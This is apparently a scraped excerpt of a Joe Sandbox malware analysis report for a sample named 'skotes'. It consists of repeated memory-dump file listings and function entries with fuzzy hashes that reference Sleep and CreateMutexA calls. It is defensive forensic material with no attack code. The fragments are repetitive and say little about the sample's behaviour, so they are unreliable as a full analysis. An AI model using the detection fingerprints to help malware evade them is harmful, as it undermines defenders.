Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: db5c6833f41963e8358addd7ec3e65323fd345a39077dc8dbbcdbcf2a8290191
Instruction ID: e648aa159c3c50e9b4b5fdc64194ab8347acd6bb7acedfbc08e08c07fa55359f
Opcode Fuzzy Hash: db5c6833f41963e8358addd7ec3e65323fd345a39077dc8dbbcdbcf2a8290191
Instruction Fuzzy Hash: BAE08C30040148AEDF257F18C80DE483B6AEF9179AF010805FD189A326CB25EE81DB80

Function 00959BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0c9e04e04e86b4412b78a528c359acc66d14e053b9a0f7a40f70b9e167f6a3f7
Instruction ID: 68142457c5a8d1e90a9b13b20af67bfaf21ef5fc6c1402cf85047d8eb5a3fb83
Opcode Fuzzy Hash: 0c9e04e04e86b4412b78a528c359acc66d14e053b9a0f7a40f70b9e167f6a3f7
Instruction Fuzzy Hash: AA314431A05200CBFB08DB69DD89B6DBB66EBC2315F248318E814D73E5C77599888796

Function 00959F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ac30ba77b7f3a782999d1aa2623c7f50fe83c9d30fc43b691608b9ff0ccac2b0
Instruction ID: 9322d7ced0a0e859e14669b259d238bcecec1511aee550a1ebdf412b02cbec76
Opcode Fuzzy Hash: ac30ba77b7f3a782999d1aa2623c7f50fe83c9d30fc43b691608b9ff0ccac2b0
Instruction Fuzzy Hash: 65318831705200CBEB18DB7ADD89BADB766EFC2315F248718E814EB2D1C73599888756

Function 0095A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734990497.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735008087.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735029886.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735050700.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735069109.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735089293.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735108488.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735172463.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735221642.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735247569.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735320354.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735346718.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735367648.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1735386720.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 62452ce97db20742e8146a2ca4244b42dbc30b9c135c4788be130c663e823cc5
Instruction ID: 0528b9ba13683e1f3eed6b42f1bb7e3d65423e6d80ee607fb0857834e2e003b5
Opcode Fuzzy Hash: 62452ce97db20742e8146a2ca4244b42dbc30b9c135c4788be130c663e823cc5
Instruction Fuzzy Hash: 48318831B151008BEB08DB79CD89B6DB767EBC2315F248318E824D73D0C73699888B5A

Function 0095A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734427412.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734445168.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734482466.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734500729.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734518471.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734535780.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734555087.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734572416.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734590165.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734610550.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734628591.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734645540.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734666014.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734709835.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734727846.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734745395.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734764734.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734784728.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734802710.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734824881.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734842567.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734860896.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734879381.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734898220.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734916451.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734935580.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734953662.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734971451.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
